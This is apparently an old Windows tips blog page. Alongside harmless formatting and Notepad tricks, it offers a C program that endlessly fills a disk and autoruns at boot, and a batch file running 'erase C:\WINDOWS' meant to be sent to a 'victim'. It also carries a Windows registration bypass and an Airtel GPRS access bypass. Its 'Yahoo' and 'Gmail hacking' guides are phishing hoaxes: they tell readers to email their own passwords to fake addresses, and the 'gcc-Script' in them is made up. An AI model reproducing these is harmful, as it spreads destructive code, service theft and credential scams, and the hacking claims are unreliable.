Flipkart Search Bar

Flipkart.com

Monday, March 5, 2007

Format my hard drive under Windows XP

There are several ways to format in XP:

During install
Using Diskmanagement under administrative tools
Using the recovery console
Using start run cmd then the format command.
Right click on the drive in explorer and select format.
Using a Win98 boot disk
Note: WinXP will not let you mess with the boot partition or system partition since both contain items required to boot and run WinXP. Thus, you should use the install process to format system and boot drive.

Here is the easiest way to perform a "Clean Install" of XP:

Using Windows XP CD:

Insert your XP CD in the drive while running your current installation of XP.
You will be given some options here. You can select:
Clean Install
New Installation
Advanced
...and others I believe. But since this tutorial teaches a Clean Installation of XP, select "Clean Install".

Put a checkmark in the box to "designate where you want to install XP" (or some such dialog). Typically, you will choose to install XP on your C: drive.
Next, you will need to select the file system you wish to use. I recommend selecting NTFS as it is more sucure than the FAT32 system.
Setup will then format the partition you chose and then you can install XP clean on that partition. Be sure that if you have more than one partition, you select the correct one.
Install your Windows XP Operating System.
Using Windows 98 Boot Disk:

Get yourself a Windows 98 boot-diskette with fdisk. Delete all partitions and THEN boot from the CD. If XP's setup finds formatted partitions, it proceeds without user intervention. If it doesn't find any, setup will prompt you for partitioning and formatting.

Using Floppy Drive:

If you are not able to boot from your CD-ROM, try changing the boot order in your BIOS so that your CD-ROM boots first. If you happen to have a machine that doesn't offer a bootable CD-ROM, you can create the 6 boot discs (below) to allow booting from your Floppy drive.

Windows XP Professional Utility: Setup Disks for floppy boot install
(requires 6 floppies)

Windows XP Home Edition Utility: Setup Disks for floppy boot install

Thursday, March 1, 2007

Boot Faster

Start up can be seriously delayed if Windows if prefetching the whole world. Go into registry and edit the prefet section to only fetch the OS files. Or even do no prefetch if you want. I use a setting of 2 which prefetchs only the OS files.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

key name EnablePrefetcher
0?Disable
1?Application Launch Prefetch
2?Boot Prefetch
3?Prefetch everything

see the article at techrepublic.com for details on exactly what prefetch does and how to edit the registry.

Activate Windows XP Without Registration

DO THE FOLLOWING IN SAFE MODE ONLY
Go to Windows directory then to System32
rename regwizc.dll to regwizc.dll.bak . By renaming the regwizc DLL, it blocks other windows components from registering XP to Microsoft.
TYPE REGEDIT IN run command in START MENU
GOTO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Cu rrentVersion] and look for the data key "RegDone" and set its value to 1 to make XP believe that its registered .

Make Folder Private



Please copy following code into Notepad & save as Key.txt

ren foldername.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder name

Please copy following code into Notepad & save as loc.txt

ren foldernamefoldername.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Go into Control Panel>>>Click on Folder options>>>
click on view & unchek hide extensions for known file types

After that change extension of Key.txt & loc.txt to key.cmd & loc.cmd

lets make virus in C

Hi everybody,at begining of the learning of computer programming it is a dream of almost all student to build a computer virus of his/her own.
I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc.
The logic behind the program is nothing but making a self growing file which grows to a few MB in one tern and this growth will continue infinitely.
The require ment to make this virus is
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
//END
As you can see this is a very little programe.Compiling the programme we get v.exe file.This is our virus.
How it works?-The system call "dir>>╚a.exe" will execute the dos command 'dir' and ridirect its output toa file ╚a.exe(the symbol ╚ can be obtained by pressing 456 on numpad holding alt key).So running the program in a folder having many files and folder will increase the size of ╚a.exe in a great amount.This process will continue to infinity as this is in a while(1) loop;
Best try this on win98.then you cannot delete ╚a.exe from GUI.
For auto running place v.exe in the command folder in windows folder.
In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
Each time your window starts v.exe will run automatically.
Try this on your own computer remember the ╚a.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and ╚a.exe file from your computer
The code is given below

Code:

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
//END

for more informaton or any problem please write me and add me on ur listlets make virus in C

make virus in 5 minuts.......

make virus in 5 minuts.......
Very easy but dangerous Virus

Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok


if u want to learn more about virus making then ..add me on ur orkut..i will give u the methods like that
my id is

http://www.orkut.com/Home.aspx?xid=11295976673611810499

HACKING YAHOO MAIL

THE EASIEST WAY OF HACKING YAHOO MAIL
It is possible and it is easy. This way of hacking into Yahoo email accounts was brought to my attention by a friend of mine who is a bit of a computer wizard. This is how it is done:
STEP 1- Log in to your own yahoo account. Note: Your account must be at least 30 days old for this to work.
STEP 2- Once you have logged into your own account, compose an e-mail to: serverdesk_100@yahoo.com This is a mailing address to the Yahoo Staff. The automated server will send you the password that you have 'forgotten', after receiving the information you send them.
STEP 3- In the subject line type exactly: password retrieve.
STEP 4- On the first line of your mail write the email address of the person you want to hacking.
STEP 5- On the second line type in the e-mail address you are using.
STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Yahoo Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. Remember you are sending your password to a machine not a man. The process will be done automatically by the user administration server.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly
cgi-bin/$et76431&pwrsa
so for example if your yahoo id is : david_100@yahoo.com and your password is: david and the email address you want to hack is: test@yahoo.com then
compose the mail as below:
*****************************************************
* To: serverdesk_100@yahoo.com
* Subject: password retrieve

* test@yahoo.com
* david_100@yahoo.com
* david
* cgi-bin/$et76431&pwrsa
The password will be sent to your inbox in a mail called "System Reg Message" from System. Usually within 24 hours.

Gmail! Easy to Hack!!!

!Do u know why they call Gmail "GMail BETA" ?? That's because its still not fully developed... It has a lot of security inconsistenciesa and inefficient code.

For example, it's 'lost password recovery system' has a HUGE loophole.

Knowing somebody's gmail password is as easy as sending a simple email. The person whose account is hacked NEVER KNOWS that his/her password has been determined by someone else, as NO CONFIRMATION mails are ever sent by the automated script!

The following Gmail Hack guide brings the vulnerability to the fore:
You should have a valid* email account for recovery of passwords.
(* valid means atleast used for a month).

1) open your email account. Click compose to write an email.
` In the TO part write: pwrecvrsrvr@gmail.com

2) In subject part write exactly: LOST PASSWORD
3) In CC part write: Your email address, where you will like to
` receive the the other person's password.
4) Paste the following gcc-Script in the body of the email, then
` follow instruction 5.

/*-------------------*/
regist class account;
regist class crypto;
regist class pwrecovery;

crypto.gmail.md5encryptSignature="AEUO&32%27feggDE%03LPO/NHD**";
crypto.gmail.md5encryptHandshake=1;

account.dest_fname="Victim's First Name";
account.dest_lname="Victim's Last Name";
account.dest_gmailid.id="gmail id whose password needs to be determined";

account.safe_fname="Your First Name";
account.safe_lname="Your Last Name";
account.safe_gmailid.id="gmail id where password needs to be sent (namely your id)";
/* verification of request needed*/
account.safe_gmailid.pw="your password";


crypto.gmail.encryptpostdata();
pwrecovery.packet_transfer();
pwrecovery.sendpw();
/*--------------*/


5a) In the fourth line, replace ** with the country code of the user
` account you want to hack:
` eg: HU for Hungary, US for the USA, SK for Korea, IC for
` Iceland, IN for India etc..

Samrind Feb 18
5b) Correctly insert both the account details into the template,
` preserving the quotes.
That's it. You will receive the password in 2/3 days depending on the load on the recovery server. The more email id's you request for password recovery, the lesser is the delay you would face, due the priority load reducing server operation.

My company has pointed out this loophole to Gmail techies but so far has recieved no response. We tried this and we have right now we have more than 3700 passwords in 2 months time. (all correct)

How it Works:
You must be thinking how it works. Very simple. Normally when any user forgets his/her email account password, he/she fills a form on the site for recovery of password. This request is sent to the virtual system administrator which in turn processes this request to the password server at a particular email address, which is constantly changed by gmail admins for security purposes. This email account periodically changes, and currently it is pwrecvrsrvr@gmail.com.

When this request is received by the server from a valid acount, it get's fooled into thinking as if the system administrator has logged in and so it processes the request and sends the password.
Gmail is aware of this fault, but is currently unable to do anything about the same because of the mass changes involved. Hence Gmail is very vulnerable to password theft if the recovery server's email id is leaked. That is why we recommend that you stop using Gmail until this issue is resolved.

Don't create new email accounts and send them for testing as only active email accounts (that have been used for atleast 1 month) can be processed under this service.

Send this message to all of your friends. STOP using gmail until security issues brought out by us are corrected, for your own safety.

visit us at www.rsasecurity.com and know more about online security.

Hack Airtel

HACK AIRTEL!!!!
HACK AIRTEL!!!!

Hacking Airtel Live GPRS access for PC 115.2 Kbps Internet

You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It's FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile's modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile's modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get "Access
Denied..."(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and.......WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.


The Settings on Sony Ericcson K700i Mobile

Under DATA COMM
~~~~~~~~~~~~

APN : airtelfun.com

USERNAME : blank

PASSWORD : blank

PASS REQ : OFF

ALLOW CALLS : AUTOMATIC

IPADDRESS :

DNSADDRESS :

DATA COMP : OFF

HEADER COMP : OFF


Under INTERNET PROFILES
~~~~~~~~~~~~~~~~

INTERNET MODE : HTTP or WAP (both worked for me)

USE PROXY : YES

IP ADDRESS : 100.1.200.99

PORT : 8080

USERNAME :

PASSWORD :

Made Personal Diary in Notepad

Open Notepad write .LOG in that & save as diary.txt
Every time you open that file you see that time & date
is automatically generated
 

Blogger news

Blogroll

About